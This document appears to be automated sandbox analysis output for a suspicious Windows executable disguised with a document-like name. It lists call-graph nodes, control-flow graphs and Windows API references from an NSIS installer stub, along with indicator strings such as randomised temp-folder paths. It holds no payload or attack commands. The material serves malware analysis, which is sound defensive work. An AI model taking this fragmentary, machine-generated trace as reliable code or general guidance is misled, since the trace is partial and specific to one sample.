4227->4256 4228->4220 4234 4049ea 4229->4234 4236 404c4f SendMessageA 4230->4236 4230->4249 4232->4233 4233->4227 4237 404cc1 GlobalFree 4233->4237 4238 404abe GetWindowLongA SetWindowLongA 4234->4238 4244 404ab8 4234->4244 4247 404a39 SendMessageA 4234->4247 4250 404a75 SendMessageA 4234->4250 4251 404a86 SendMessageA 4234->4251 4241 404e49 ShowWindow GetDlgItem ShowWindow 4235->4241 4235->4249 4240 404c62 4236->4240 4237->4227 4239 404ad7 4238->4239 4242 404af5 4239->4242 4243 404add ShowWindow 4239->4243 4248 404c73 SendMessageA 4240->4248 4241->4249 4261 403f17 SendMessageA 4242->4261 4260 403f17 SendMessageA 4243->4260 4244->4238 4244->4239 4247->4234 4248->4219 4249->4225 4250->4234 4251->4234 4252->4256 4253 404e0d InvalidateRect 4253->4235 4254 404e23 4253->4254 4262 40479c 4254->4262 4255 404d31 SendMessageA 4259 404d47 4255->4259 4256->4255 4256->4259 4258 404dbb SendMessageA SendMessageA 4258->4259 4259->4253 4259->4258 4260->4249 4261->4217 4265 4046d7 4262->4265 4264 4047b1 4264->4235 4266 4046ed 4265->4266 4267 405d1f 18 API calls 4266->4267 4268 404751 4267->4268 4269 405d1f 18 API calls 4268->4269 4270 40475c 4269->4270 4271 405d1f 18 API calls 4270->4271 4272 404772 lstrlenA wsprintfA SetDlgItemTextA 4271->4272 4272->4264 3500 401595 3501 402a3a 18 API calls 3500->3501 3502 40159c SetFileAttributesA 3501->3502 3503 4015ae 3502->3503 4273 402616 4274 40261d 4273->4274 4277 40287c 4273->4277 4275 402a1d 18 API calls 4274->4275 4276 402628 4275->4276 4278 40262f SetFilePointer 4276->4278 4278->4277 4279 40263f 4278->4279 4281 405c5b wsprintfA 4279->4281 4281->4277 4282 401717 4283 402a3a 18 API calls 4282->4283 4284 40171e SearchPathA 4283->4284 4285 401739 4284->4285 4286 402519 4287 40252e 4286->4287 4288 40251e 4286->4288 4290 402a3a 18 API calls 4287->4290 4289 402a1d 18 API calls 4288->4289 4292 402527 4289->4292 4291 402535 lstrlenA 4290->4291 4291->4292 4293 402557 4292->4293 4294 405a17 WriteFile 4292->4294 4294->4293 4295 40149d 4296 4014ab PostQuitMessage 4295->4296 4297 40226e 4295->4297 4296->4297 4298 404320 4299 40434c 4298->4299 4300 40435d 4298->4300 4359 4054d7 GetDlgItemTextA 4299->4359 4302 404369 GetDlgItem 4300->4302 4309 4043c8 4300->4309 4304 40437d 4302->4304 4303 404357 4306 405f68 5 API calls 4303->4306 4307 404391 SetWindowTextA 4304->4307 4312 405808 4 API calls 4304->4312 4305 4044ac 4308 404656 4305->4308 4361 4054d7 GetDlgItemTextA 4305->4361 4306->4300 4313 403ee2 19 API calls 4307->4313 4311 403f49 8 API calls 4308->4311 4309->4305 4309->4308 4314 405d1f 18 API calls 4309->4314 4319 40466a 4311->4319 4320 404387 4312->4320 4316 4043ad 4313->4316 4317 40443c SHBrowseForFolderA 4314->4317 4315 4044dc 4318 40585d 18 API calls 4315->4318 4321 403ee2 19 API calls 4316->4321 4317->4305 4322 404454 CoTaskMemFree 4317->4322 4323 4044e2 4318->4323 4320->4307 4326 40576f 3 API calls 4320->4326 4324 4043bb 4321->4324 4325 40576f 3 API calls 4322->4325 4362 405cfd lstrcpynA 4323->4362 4360 403f17 SendMessageA 4324->4360 4328 404461 4325->4328 4326->4307 4331 404498 SetDlgItemTextA 4328->4331 4335 405d1f 18 API calls 4328->4335 4330 4043c1 4333 406092 5 API calls 4330->4333 4331->4305 4332 4044f9 4334 406092 5 API calls 4332->4334 4333->4309 4342 404500 4334->4342 4336 404480 lstrcmpiA 4335->4336 4336->4331 4339 404491 lstrcatA 4336->4339 4337 40453c 4363 405cfd lstrcpynA 4337->4363 4339->4331 4340 404543 4341 405808 4 API calls 4340->4341 4343 404549 GetDiskFreeSpaceA 4341->4343 4342->4337 4346 4057b6 2 API calls 4342->4346 4347 404594 4342->4347 4345 40456d MulDiv 4343->4345 4343->4347 4345->4347 4346->4342 4348 40479c 21 API calls 4347->4348 4356 404605 4347->4356 4350 4045f2 4348->4350 4349 404628 4364 403f04 KiUserCallbackDispatcher 4349->4364 4353 404607 SetDlgItemTextA 4350->4353 4354 4045f7 4350->4354 4351 40140b 2 API calls 4351->4349 4353->4356 4355 4046d7 21 API calls 4354->4355 4355->4356 4356->4349 4356->4351 4357 404644 4357->4308 4365 4042b5 4357->4365 4359->4303 4360->4330 4361->4315 4362->4332 4363->4340 4364->4357 4366 4042c3 4365->4366 4367 4042c8 SendMessageA 4365->4367 4366->4367 4367->4308 4368 401b23 4369 401b30 4368->4369 4370 401b74 4368->4370 4373 401bb8 4369->4373 4376 401b47 4369->4376 4371 401b78 4370->4371 4372 401b9d GlobalAlloc 4370->4372 4383 40226e 4371->4383 4389 405cfd lstrcpynA 4371->4389 4375 405d1f 18 API calls 4372->4375 4374 405d1f 18 API calls 4373->4374 4373->4383 4377 402268 4374->4377 4375->4373 4387 405cfd lstrcpynA 4376->4387 4381 4054f3 MessageBoxIndirectA 4377->4381 4380 401b8a GlobalFree 4380->4383 4381->4383 4382 401b56 4388 405cfd lstrcpynA 4382->4388 4385 401b65 4390 405cfd lstrcpynA 4385->4390 4387->4382 4388->4385 4389->4380 4390->4383 4391 401ca7 4392 402a1d 18 API calls 4391->4392 4393 401cae 4392->4393 4394 402a1d 18 API calls 4393->4394 4395 401cb6 GetDlgItem 4394->4395 4396 402513 4395->4396 4410 4028aa SendMessageA 4411 4028c4 InvalidateRect 4410->4411 4412 4028cf 4410->4412 4411->4412 4413 40402b 4414 404041 4413->4414 4421 40414d 4413->4421 4418 403ee2 19 API calls 4414->4418 4415 4041bc 4416 404290 4415->4416 4417 4041c6 GetDlgItem 4415->4417 4423 403f49 8 API calls 4416->4423 4419 4041dc 4417->4419 4420 40424e 4417->4420 4422 404097 4418->4422 4419->4420 4427 404202 6 API calls 4419->4427 4420->4416 4428 404260 4420->4428 4421->4415 4421->4416 4425 404191 GetDlgItem SendMessageA 4421->4425 4424 403ee2 19 API calls 4422->4424 4435 40428b 4423->4435 4426 4040a4 CheckDlgButton 4424->4426 4444 403f04 KiUserCallbackDispatcher 4425->4444 4442 403f04 KiUserCallbackDispatcher 4426->4442 4427->4420 4431 404266 SendMessageA 4428->4431 4432 404277 4428->4432 4431->4432 4432->4435 4436 40427d SendMessageA 4432->4436 4433 4041b7 4437 4042b5 SendMessageA 4433->4437 4434 4040c2 GetDlgItem 4443 403f17 SendMessageA 4434->4443 4436->4435 4437->4415 4439 4040d8 SendMessageA 4440 4040f6 GetSysColor 4439->4440 4441 4040ff SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4439->4441 4440->4441 4441->4435 4442->4434 4443->4439 4444->4433 3398 4015b3 3399 402a3a 18 API calls 3398->3399 3400 4015ba 3399->3400 3418 405808 CharNextA CharNextA 3400->3418 3402 4015c2 3403 40161c 3402->3403 3404 40579a CharNextA 3402->3404 3414 4015eb 3402->3414 3416 401604 GetFileAttributesA 3402->3416 3425 405476 3402->3425 3433 405459 CreateDirectoryA 3402->3433 3405 401621 3403->3405 3406 40164a 3403->3406 3404->3402 3407 401423 25 API calls 3405->3407 3409 401423 25 API calls 3406->3409 3408 401628 3407->3408 3424 405cfd lstrcpynA 3408->3424 3415 401642 3409->3415 3413 401633 SetCurrentDirectoryA 3413->3415 3414->3402 3428 4053dc CreateDirectoryA 3414->3428 3416->3402 3419 405833 3418->3419 3420 405823 3418->3420 3422 40579a CharNextA 3419->3422 3423 405853 3419->3423 3420->3419 3421 40582e CharNextA 3420->3421 3421->3423 3422->3419 3423->3402 3424->3413 3436 406092 GetModuleHandleA 3425->3436 3429 405429 3428->3429 3430 40542d GetLastError 3428->3430 3429->3414 3430->3429 3431 40543c SetFileSecurityA 3430->3431 3431->3429 3432 405452 GetLastError 3431->3432 3432->3429 3434 405469 3433->3434 3435 40546d GetLastError 3433->3435 3434->3402 3435->3434 3437 4060b8 GetProcAddress 3436->3437 3438 4060ae 3436->3438 3440 40547d 3437->3440 3442 406028 GetSystemDirectoryA 3438->3442 3440->3402 3441 4060b4 3441->3437 3441->3440 3443 40604a wsprintfA LoadLibraryA 3442->3443 3443->3441 4445 4016b3 4446 402a3a 18 API calls 4445->4446 4447 4016b9 GetFullPathNameA 4446->4447 4448 4016f1 4447->4448 4449 4016d0 4447->4449 4450 401705 GetShortPathNameA 4448->4450 4451 4028cf 4448->4451 4449->4448 4452 406001 2 API calls 4449->4452 4450->4451 4453 4016e1 4452->4453 4453->4448 4455 405cfd lstrcpynA 4453->4455 4455->4448 4463 4014b7 4464 4014bd 4463->4464 4465 401389 2 API calls 4464->4465 4466 4014c5 4465->4466 4467 401d38 GetDC GetDeviceCaps 4468 402a1d 18 API calls 4467->4468 4469 401d56 MulDiv ReleaseDC 4468->4469 4470 402a1d 18 API calls 4469->4470 4471 401d75 4470->4471 4472 405d1f 18 API calls 4471->4472 4473 401dae CreateFontIndirectA 4472->4473 4474 402513 4473->4474 4475 40363b 4476 403646 4475->4476 4477 40364a 4476->4477 4478 40364d GlobalAlloc 4476->4478 4478->4477 4479 40173e 4480 402a3a 18 API calls 4479->4480 4481 401745 4480->4481 4482 40599f 2 API calls 4481->4482 4483 40174c 4482->4483 4483->4483 4484 401ebe 4485 402a3a 18 API calls 4484->4485 4486 401ec5 4485->4486 4487 406001 2 API calls 4486->4487 4488 401ecb 4487->4488 4490 401edd 4488->4490 4491 405c5b wsprintfA 4488->4491 4491->4490 4492 40193f 4493 402a3a 18 API calls 4492->4493 4494 401946 lstrlenA 4493->4494 4495 402513 4494->4495

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4030d9-40310e SetErrorMode GetVersion 1 403110-403118 call 406092 0->1 2 403121-4031b2 call 406028 * 3 call 406092 * 2 #17 OleInitialize SHGetFileInfoA call 405cfd GetCommandLineA call 405cfd GetModuleHandleA 0->2 1->2 8 40311a 1->8 20 4031b4-4031b9 2->20 21 4031be-4031d3 call 40579a CharNextA 2->21 8->2 20->21 24 403298-40329c 21->24 25 4032a2 24->25 26 4031d8-4031db 24->26 29 4032b5-4032cf GetTempPathA call 4030a8 25->29 27 4031e3-4031eb 26->27 28 4031dd-4031e1 26->28 30 4031f3-4031f6 27->30 31 4031ed-4031ee 27->31 28->27 28->28 39 4032d1-4032ef GetWindowsDirectoryA lstrcatA call 4030a8 29->39 40 403327-403341 DeleteFileA call 402c66 29->40 33 403288-403295 call 40579a 30->33 34 4031fc-403200 30->34 31->30 33->24 48 403297 33->48 37 403202-403208 34->37 38 403218-403245 34->38 43 40320a-40320c 37->43 44 40320e 37->44 45 403247-40324d 38->45 46 403258-403286 38->46 39->40 57 4032f1-403321 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030a8 39->57 54 4033d5-4033e5 call 4035a3 OleUninitialize 40->54 55 403347-40334d 40->55 43->38 43->44 44->38 50 403253 45->50 51 40324f-403251 45->51 46->33 53 4032a4-4032b0 call 405cfd 46->53 48->24 50->46 51->46 51->50 53->29 68 403509-40350f 54->68 69 4033eb-4033fb call 4054f3 ExitProcess 54->69 58 4033c5-4033cc call 40367d 55->58 59 40334f-40335a call 40579a 55->59 57->40 57->54 66 4033d1 58->66 70 403390-40339a 59->70 71 40335c-403385 59->71 66->54 73 403511-40352a GetCurrentProcess OpenProcessToken 68->73 74 40358b-403593 68->74 78 403401-403415 call 405476 lstrcatA 70->78 79 40339c-4033a9 call 40585d 70->79 75 403387-403389 71->75 81 40355c-40356a call 406092 73->81 82 40352c-403556 LookupPrivilegeValueA AdjustTokenPrivileges 73->82 76 403595 74->76 77 403599-40359d ExitProcess 74->77 75->70 84 40338b-40338e 75->84 76->77 93 403422-40343c lstrcatA lstrcmpiA 78->93 94 403417-40341d lstrcatA 78->94 79->54 92 4033ab-4033c1 call 405cfd * 2 79->92 90 403578-403582 ExitWindowsEx 81->90 91 40356c-403576 81->91 82->81 84->70 84->75 90->74 96 403584-403586 call 40140b 90->96 91->90 91->96 92->58 93->54 95 40343e-403441 93->95 94->93 99 403443-403448 call 4053dc 95->99 100 40344a call 405459 95->100 96->74 108 40344f-40345c SetCurrentDirectoryA 99->108 100->108 109 403469-403491 call 405cfd 108->109 110 40345e-403464 call 405cfd 108->110 114 403497-4034b3 call 405d1f DeleteFileA 109->114 110->109 117 4034f4-4034fb 114->117 118 4034b5-4034c5 CopyFileA 114->118 117->114 120 4034fd-403504 call 405bb8 117->120 118->117 119 4034c7-4034e7 call 405bb8 call 405d1f call 40548e 118->119 119->117 129 4034e9-4034f0 CloseHandle 119->129 120->54 129->117
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 004030FE
                                                  • GetVersion.KERNEL32 ref: 00403104
                                                  • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
                                                  • OleInitialize.OLE32(00000000), ref: 0040315A
                                                  • SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
                                                  • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",00000000), ref: 0040319E
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",00000020), ref: 004031C9
                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032C6
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D7
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E3
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F7
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FF
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403310
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403318
                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040332C
                                                    • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                    • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                  • OleUninitialize.OLE32(?), ref: 004033DA
                                                    • Part of subcall function 004054F3: MessageBoxIndirectA.USER32(00409230), ref: 0040554E
                                                  • ExitProcess.KERNEL32 ref: 004033FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
                                                  • String ID: "$"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Deinotherium$C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten$C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro$C:\Users\user\Desktop$C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
                                                  • API String ID: 2526692829-2319894935
                                                  • Opcode ID: 65d8c7c0dc71d37f73623eda482e5ff5e021372f15626971e5a0e3397de26aea
                                                  • Instruction ID: bda156f374487f2bbb29673c031f74f644c2b1eaea70be50b0a917a6d4bf9e43
                                                  • Opcode Fuzzy Hash: 65d8c7c0dc71d37f73623eda482e5ff5e021372f15626971e5a0e3397de26aea
                                                  • Instruction Fuzzy Hash: 17C1E6706082427AE7116F719D4DA2B3EACEB8570AF04457FF542B51E2CB7C9A058B2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 405054-405070 131 405076-40513d GetDlgItem * 3 call 403f17 call 4047b4 GetClientRect GetSystemMetrics SendMessageA * 2 130->131 132 4051ff-405205 130->132 150 40515b-40515e 131->150 151 40513f-405159 SendMessageA * 2 131->151 134 405207-405229 GetDlgItem CreateThread FindCloseChangeNotification 132->134 135 40522f-40523b 132->135 134->135 137 40525d-405263 135->137 138 40523d-405243 135->138 142 405265-40526b 137->142 143 4052b8-4052bb 137->143 140 405245-405258 ShowWindow * 2 call 403f17 138->140 141 40527e-405285 call 403f49 138->141 140->137 154 40528a-40528e 141->154 147 405291-4052a1 ShowWindow 142->147 148 40526d-405279 call 403ebb 142->148 143->141 145 4052bd-4052c3 143->145 145->141 152 4052c5-4052d8 SendMessageA 145->152 155 4052b1-4052b3 call 403ebb 147->155 156 4052a3-4052ac call 404f16 147->156 148->141 159 405160-40516c SendMessageA 150->159 160 40516e-405185 call 403ee2 150->160 151->150 161 4053d5-4053d7 152->161 162 4052de-40530a CreatePopupMenu call 405d1f AppendMenuA 152->162 155->143 156->155 159->160 169 405187-40519b ShowWindow 160->169 170 4051bb-4051dc GetDlgItem SendMessageA 160->170 161->154 167 40530c-40531c GetWindowRect 162->167 168 40531f-405335 TrackPopupMenu 162->168 167->168 168->161 172 40533b-405355 168->172 173 4051aa 169->173 174 40519d-4051a8 ShowWindow 169->174 170->161 171 4051e2-4051fa SendMessageA * 2 170->171 171->161 175 40535a-405375 SendMessageA 172->175 176 4051b0-4051b6 call 403f17 173->176 174->176 175->175 177 405377-405397 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 175->177 176->170 179 405399-4053b9 SendMessageA 177->179 179->179 180 4053bb-4053cf GlobalUnlock SetClipboardData CloseClipboard 179->180 180->161
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004050B3
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050C2
                                                  • GetClientRect.USER32(?,?), ref: 004050FF
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405106
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405127
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405138
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040514B
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405159
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040516C
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518E
                                                  • ShowWindow.USER32(?,00000008), ref: 004051A2
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051C3
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051D3
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051EC
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F8
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004050D1
                                                    • Part of subcall function 00403F17: SendMessageA.USER32(00000028,?,00000001,00403D48), ref: 00403F25
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405214
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405229
                                                  • ShowWindow.USER32(00000000), ref: 0040524C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405253
                                                  • ShowWindow.USER32(00000008), ref: 00405299
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052CD
                                                  • CreatePopupMenu.USER32 ref: 004052DE
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052F3
                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405313
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405368
                                                  • OpenClipboard.USER32(00000000), ref: 00405378
                                                  • EmptyClipboard.USER32 ref: 0040537E
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405391
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A5
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004053C9
                                                  • CloseClipboard.USER32 ref: 004053CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                  • String ID: Nonefficient Setup: Completed$k]
                                                  • API String ID: 4154960007-2221223368
                                                  • Opcode ID: 09f7ddcf63cd4f4ef3040ce5ab01ed0e68b6951386b470d6f77b133494d1d41b
                                                  • Instruction ID: a6ff68720be7f0e5d6bf60450920f0594ccff0b83ae89a6b9846e031650dbd60
                                                  • Opcode Fuzzy Hash: 09f7ddcf63cd4f4ef3040ce5ab01ed0e68b6951386b470d6f77b133494d1d41b
                                                  • Instruction Fuzzy Hash: 31A16B71900209BFDB119FA0DD89AAE7B79FB08354F10407AFA01B62A0C7B55E419F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 425 405d1f-405d2a 426 405d2c-405d3b 425->426 427 405d3d-405d52 425->427 426->427 428 405f45-405f49 427->428 429 405d58-405d63 427->429 431 405d75-405d7f 428->431 432 405f4f-405f59 428->432 429->428 430 405d69-405d70 429->430 430->428 431->432 433 405d85-405d8c 431->433 434 405f64-405f65 432->434 435 405f5b-405f5f call 405cfd 432->435 436 405d92-405dc7 433->436 437 405f38 433->437 435->434 439 405ee2-405ee5 436->439 440 405dcd-405dd8 GetVersion 436->440 441 405f42-405f44 437->441 442 405f3a-405f40 437->442 445 405f15-405f18 439->445 446 405ee7-405eea 439->446 443 405df2 440->443 444 405dda-405dde 440->444 441->428 442->428 452 405df9-405e00 443->452 444->443 449 405de0-405de4 444->449 447 405f26-405f36 lstrlenA 445->447 448 405f1a-405f21 call 405d1f 445->448 450 405efa-405f06 call 405cfd 446->450 451 405eec-405ef8 call 405c5b 446->451 447->428 448->447 449->443 457 405de6-405dea 449->457 461 405f0b-405f11 450->461 451->461 453 405e02-405e04 452->453 454 405e05-405e07 452->454 453->454 459 405e40-405e43 454->459 460 405e09-405e24 call 405be4 454->460 457->443 462 405dec-405df0 457->462 466 405e53-405e56 459->466 467 405e45-405e51 GetSystemDirectoryA 459->467 468 405e29-405e2c 460->468 461->447 465 405f13 461->465 462->452 469 405eda-405ee0 call 405f68 465->469 471 405ec0-405ec2 466->471 472 405e58-405e66 GetWindowsDirectoryA 466->472 470 405ec4-405ec7 467->470 473 405e32-405e3b call 405d1f 468->473 474 405ec9-405ecd 468->474 469->447 470->469 470->474 471->470 475 405e68-405e72 471->475 472->471 473->470 474->469 478 405ecf-405ed5 lstrcatA 474->478 480 405e74-405e77 475->480 481 405e8c-405ea2 SHGetSpecialFolderLocation 475->481 478->469 480->481 485 405e79-405e80 480->485 482 405ea4-405ebb SHGetPathFromIDListA CoTaskMemFree 481->482 483 405ebd 481->483 482->470 482->483 483->471 486 405e88-405e8a 485->486 486->470 486->481
                                                  APIs
                                                  • GetVersion.KERNEL32(?,rghtten,00000000,00404F4E,rghtten,00000000), ref: 00405DD0
                                                  • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E4B
                                                  • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E5E
                                                  • SHGetSpecialFolderLocation.SHELL32(?,0040E8D8), ref: 00405E9A
                                                  • SHGetPathFromIDListA.SHELL32(0040E8D8,: Completed), ref: 00405EA8
                                                  • CoTaskMemFree.OLE32(0040E8D8), ref: 00405EB3
                                                  • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                  • lstrlenA.KERNEL32(: Completed,?,rghtten,00000000,00404F4E,rghtten,00000000), ref: 00405F27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$rghtten
                                                  • API String ID: 900638850-3901407734
                                                  • Opcode ID: 76471c8d00273be914602d8a65b1299599c04e7f86aa9f6c9fc5dbb2c8e8775a
                                                  • Instruction ID: 0882c4b3dedd804cc86cf07441b0505b0d3b9fa6fe4ef2b0f086a7f01eec187c
                                                  • Opcode Fuzzy Hash: 76471c8d00273be914602d8a65b1299599c04e7f86aa9f6c9fc5dbb2c8e8775a
                                                  • Instruction Fuzzy Hash: D261F171A04A02ABDF209F24CC8877B3BA4EB55315F14813BE941BA2D0D27D4A42DF9E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
